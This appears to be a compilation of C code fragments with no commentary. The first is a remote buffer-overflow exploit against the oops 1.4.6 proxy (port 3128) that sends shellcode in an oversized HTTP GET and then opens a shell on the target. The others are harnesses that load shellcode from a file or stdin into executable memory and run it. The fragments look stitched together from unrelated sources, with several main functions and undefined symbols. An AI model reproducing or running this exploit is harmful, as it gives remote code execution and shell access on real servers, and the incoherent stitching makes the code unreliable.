main(int ac, char** av){ #define SZ 0x2000 #define FIL 0xbf char buf[SZ],buf2[SZ],*pc,c; int i,sock; struct sockaddr_in sin; short port=3128; unsigned *pu; memset(buf,FIL,SZ); shellcode(buf); buf[strlen(buf)]=FIL; pc=&buf[OFFSET2]; shellcode(pc); pc+=strlen(pc); *pc=FIL; pu=(unsigned*)&buf[RETOFF]; *pu=BUFADDR; buf[RETOFF+4]=0; strcpy(buf2,"GET http://p"); strcat(buf2,buf); strcat(buf2," HTTP/1.0\r\n\r\n"); fprintf(stderr,"oops-1.4.6 remote xpl0it for 4.x by diman.\n"); fprintf(stderr,"use for educational purpose only.\n"); if(ac<2) { fprintf(stderr,"usage: ./oopz target_host [port, def=3128]\n"); exit(0); } pc=av[1]; if(ac>2) port=atoi(av[2]); if(!res(pc,&sin)) { fprintf(stderr,"can't resolve %s\n",pc); exit(0); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); sin.sin_port=htons(port); if(connect(sock,(struct sockaddr*)&sin,sizeof(struct sockaddr))==-1) { fprintf(stderr,"can't connect %s:%d\n",pc,port); exit(0); } fprintf(stderr,"Connected. Sending surprise...\n"); send(sock,buf2,strlen(buf2),0); spawned_shell(sock); }
int main(int argc, char **argv) { int fd; struct stat sbuf; void (*shellcode)(void); int i, z; unsigned char *p; if (argc != 2) { fprintf(stderr, "Usage: %s [filename]\n", argv[0]); return EXIT_FAILURE; } if ((fd = open(argv[1], O_RDONLY)) < 0) { perror("open() failed"); return EXIT_FAILURE; } if (fstat(fd, &sbuf)) { perror("fstat() failed"); return EXIT_FAILURE; } if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0)) == MAP_FAILED) { perror("mmap() failed"); return EXIT_FAILURE; } close(fd); printf("Read %d bytes of shell code. Here goes.\n", (int)sbuf.st_size); for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) { if (p[i] == '\0') z++; } if (z > 0) printf("Shellcode contains %d zero bytes.\n", z); printf("~~~ Running shellcode ~~~\n"); shellcode(); /* should not be reached */ return EXIT_FAILURE; }
int main(int argc, char **argv) { char *stack_space[0x1000]; int fd; struct stat sbuf; void (*shellcode)(void); int i, z, c, bufsize, numb; unsigned char *p; if (argc != 2) { fprintf(stderr, "Usage: %s (<filename>|-)\n", argv[0]); return EXIT_FAILURE; } if (strcmp(argv[1], "-") == 0) { bufsize = 4096; p = malloc(bufsize); z = 0; numb = 0; while ((c = getchar()) != EOF) { if (numb == bufsize) { bufsize += 4096; p = realloc(p, bufsize); } p[numb++] = c; if (c == '\0') z++; } if ((shellcode = mmap(NULL, numb, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0)) == MAP_FAILED) { perror("mmap() failed"); return EXIT_FAILURE; } memcpy(shellcode, p, numb); free(p); } else { if ((fd = open(argv[1], O_RDONLY)) < 0) { perror("open() failed"); return EXIT_FAILURE; } if (fstat(fd, &sbuf)) { perror("fstat() failed"); return EXIT_FAILURE; } if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE, fd, 0)) == MAP_FAILED) { perror("mmap() failed"); return EXIT_FAILURE; } close(fd); for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) { if (p[i] == '\0') z++; } numb = sbuf.st_size; } printf("Read %d bytes of shell code. Here goes.\n", numb); if (z > 0) printf("Shellcode contains %d zero bytes.\n", z); printf("~~~ Running shellcode ~~~\n"); shellcode(); /* should not be reached */ return EXIT_FAILURE; }
int sctest(ShellCode const sc) { int(*shellcode)() = (int (*)())sc.code; shellcode(); return EXIT_SUCCESS; }
int main(int argc, char** argv) { printf("Shellcode size is %d bytes\n", strlen(code)); int (*shellcode)() = (int(*)())code; shellcode(); }
int main() { //printf("Shellcode size: %d bytes\n", sizeof(&shellcode)); int i; for(i=0; i<=256; i++) putchar((char *)(shellcode+i)); shellcode(); }